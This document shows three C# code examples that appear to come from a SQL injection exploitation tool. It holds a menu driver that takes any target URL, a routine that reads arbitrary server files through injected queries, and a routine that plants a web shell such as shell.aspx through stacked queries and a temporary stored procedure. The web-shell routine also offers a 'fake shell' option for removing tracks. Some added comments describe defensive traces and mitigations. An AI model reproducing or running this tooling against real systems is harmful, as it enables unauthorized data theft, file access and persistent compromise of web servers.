コード例 #1
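        /// <summary>
        /// Console entry point: loads the query templates, shows the banner, then repeatedly
        /// asks for a target URL and offers a numeric menu that dispatches to the four modules
        /// visible in the menu text (directory listing, data dump, file read, file upload).
        /// </summary>
        /// <remarks>
        /// The URL typed here is handed unchanged to every module; nothing in this method
        /// validates it or restricts it to a particular host or scope.
        /// </remarks>
        /// <param name="args">Command-line arguments; not used.</param>
        static void Main(string[] args)
        {
            QueriesDB.initialize();

            UserInteraction.showBanner();

            while (true)
            {
                Log.logNotification("Press 'x' for exit..");

                UserInteraction.promptForUserInput("Enter url");
                string basicURL = Console.ReadLine();

                // ReadLine returns null once stdin is closed. The original looped forever in
                // that case, calling Exploitation.initialize(null) on every pass.
                if (basicURL == null || basicURL == "x")
                {
                    break;
                }

                // An empty line is not a target: ask again without touching any module.
                if (basicURL.Length == 0)
                {
                    continue;
                }

                // Only initialise against a real entry. The original also ran this for the
                // "x" sentinel and for empty input, before its own guard was evaluated.
                Exploitation.initialize(basicURL);

                int choice = -1;

                while (choice != 0)
                {
                    choice = UserInteraction.showMenuForIntChoice("Press '0' for Exit..\nPress '1' for directory navigation..\nPress '2' for dumping data.." +
                                                                  "\nPress '3' for files reading..\nPress '4' for shell uploading..");

                    switch (choice)
                    {
                        case 1:
                            DirListing.initialize(basicURL);
                            break;
                        case 2:
                            DumpData.initialize(basicURL);
                            break;
                        case 3:
                            ReadFile.Read(basicURL);
                            break;
                        case 4:
                            ShellSpawning.Spawn(basicURL);
                            break;
                        default:
                            // 0 leaves the menu; any other value simply shows it again.
                            break;
                    }
                }
            }

            Log.logOutput("Program is going to exit.. Press any key..");

            // Console.ReadKey throws InvalidOperationException when stdin is redirected,
            // so only wait for a key press on an interactive console.
            if (!Console.IsInputRedirected)
            {
                Console.ReadKey();
            }
        }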
コード例 #2
        /// <summary>
        /// Interactive loop that asks for a file path, substitutes it into a query URL built
        /// once from <c>QueriesDB.ReadFileOpenRowSetQuery</c>, fetches that URL and prints the
        /// filtered response. The operator may then save the text via <c>SaveFile</c>.
        /// Entering "x" at the path prompt ends the loop.
        /// </summary>
        /// <remarks>
        /// The template and the response filter are defined elsewhere. The template's name
        /// suggests an OPENROWSET-style read performed by the database server itself - not
        /// confirmed from this listing. If so, the read succeeds only where the application's
        /// database login may read files on the server. Parameterised queries in the target
        /// application, and a login without bulk-read rights, both remove the primitive.
        /// The typed path is inserted with a plain string replace, with no escaping or encoding.
        /// </remarks>
        /// <param name="url">Target URL passed through to the query builder.</param>
        public static void Read(string url)
        {
            string readTemplate = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);

            while (true)
            {
                string requestedPath = UserInteraction.takeInputString("Press x to exit..\nEnter full/root path for file to read.. eg. E:\\inetpub\\site\\somefile.ext ..");
                if (requestedPath == "x")
                {
                    break;
                }

                var response = HTTPMethods.getResponse(readTemplate.Replace("[FILENAME]", requestedPath));
                if (response == null)
                {
                    // No HTTP response at all: nothing is logged, the prompt is shown again.
                    continue;
                }

                response = ResponseFilter.getPureResponseWithLastIndex(response);
                if (response == null)
                {
                    Log.logError("Either File is empty or you 've no right to read that File..");
                    continue;
                }

                Log.logOutput("--- [File Contents Start]  ---");
                Log.logOutput(response);
                // "Cotents" is the original runtime string, kept as-is.
                Log.logOutput("--- [File Cotents End] ---");

                // The save answer is held separately, so typing "x" here does not end the loop.
                string saveAnswer = UserInteraction.takeInputString("Press s to save File Or Enter to Ignore..");
                if (saveAnswer == "s")
                {
                    SaveFile(response);
                }
            }
        }
コード例 #3
        /// <summary>
        /// Interactive routine that, through query URLs built from templates in
        /// <c>QueriesDB</c>, attempts to write a file into a directory on the target host and
        /// then checks that it was written.
        /// </summary>
        /// <remarks>
        /// Sequence as visible here: (1) confirm the target reflects the marker value
        /// <c>QueriesDB.Replacement</c>; (2) call <c>createProcFcUk</c>; (3) loop over
        /// operator-supplied path and file name, issue the upload URL and verify the result;
        /// (4) call <c>dropObject</c> with <c>QueriesDB.DropFcUkProcQuery</c>.
        /// The helpers and templates are defined elsewhere. Their names suggest that a helper
        /// stored procedure is created and later dropped, and that the upload relies on a
        /// stacked (multi-statement) query - presumed, not shown in this listing.
        ///
        /// Reviewer notes for defenders: if those presumptions hold, the routine leaves two
        /// kinds of trace. One is a procedure created and dropped under the web application's
        /// database login; the other is a new file in a web-served directory. Both are worth
        /// alerting on. The technique is blocked when the application uses parameterised
        /// queries, when its database login cannot create procedures or reach the file system,
        /// and when the database service account has no write access to the web root.
        /// </remarks>
        /// <param name="url">Target URL passed through to the query builders and helpers.</param>
        public static void Spawn(string url)
        {
            Log.logNotification("Confirming Web Response..");

            // Build a probe URL carrying the marker value, then check that the marker comes back.
            var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);

            if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
            {
                Log.logNotification("Web Response is OK..");

                // createProcFcUk is defined elsewhere; the upload loop only runs if it reports success.
                if (createProcFcUk(url))
                {
                    // "z" is just a non-"x" seed so the loop body runs at least once.
                    string RootPath = "z";
                    while (RootPath != "x")
                    {
                        RootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ ");
                        if (RootPath != "x")
                        {
                            string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx ..");

                            string UrlForUploading = null;

                            // Any answer other than "f" selects the REAL template. The contents
                            // of both templates live in QueriesDB and are not visible here.
                            string x = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks..");

                            if (x == "f")
                            {
                                UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE);
                            }
                            else
                            {
                                UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL);
                            }


                            // Placeholders are filled by plain, sequential string replacement:
                            // operator input is inserted without escaping, and a placeholder
                            // token appearing inside earlier input would be replaced by a later call.
                            UrlForUploading = UrlForUploading.Replace("[PATH]", RootPath);
                            UrlForUploading = UrlForUploading.Replace("[FILENAME]", fileName);
                            // The template's hard-coded marker text is swapped for the configured marker.
                            UrlForUploading = UrlForUploading.Replace("rummykhan", QueriesDB.Replacement);

                            Log.logNotification("Uploading shell to " + RootPath + fileName);

                            // First check: the upload request itself echoed the marker.
                            // If it did not, nothing is logged and the path prompt is shown again.
                            if (ResponseFilter.confirmResponce(UrlForUploading, QueriesDB.Replacement))
                            {
                                Log.logNotification("Confirming File Upload..");
                                // Second check: confirmFileUpload (defined elsewhere) is asked about the
                                // concatenated path; RootPath is expected to end with a separator.
                                if (confirmFileUpload(url, RootPath + fileName))
                                {
                                    Log.logOutput("Shell uploaded successfully to : " + RootPath + fileName);
                                }
                                else
                                {
                                    Log.logError("Fail to upload file..");
                                }
                            }
                        }
                    }
                }
                // Cleanup sits outside the createProcFcUk check, so the drop request is issued
                // even when creation reported failure.
                dropObject(url, QueriesDB.DropFcUkProcQuery);
            }
            else
            {
                Log.logError("No response from the server..");
            }
        }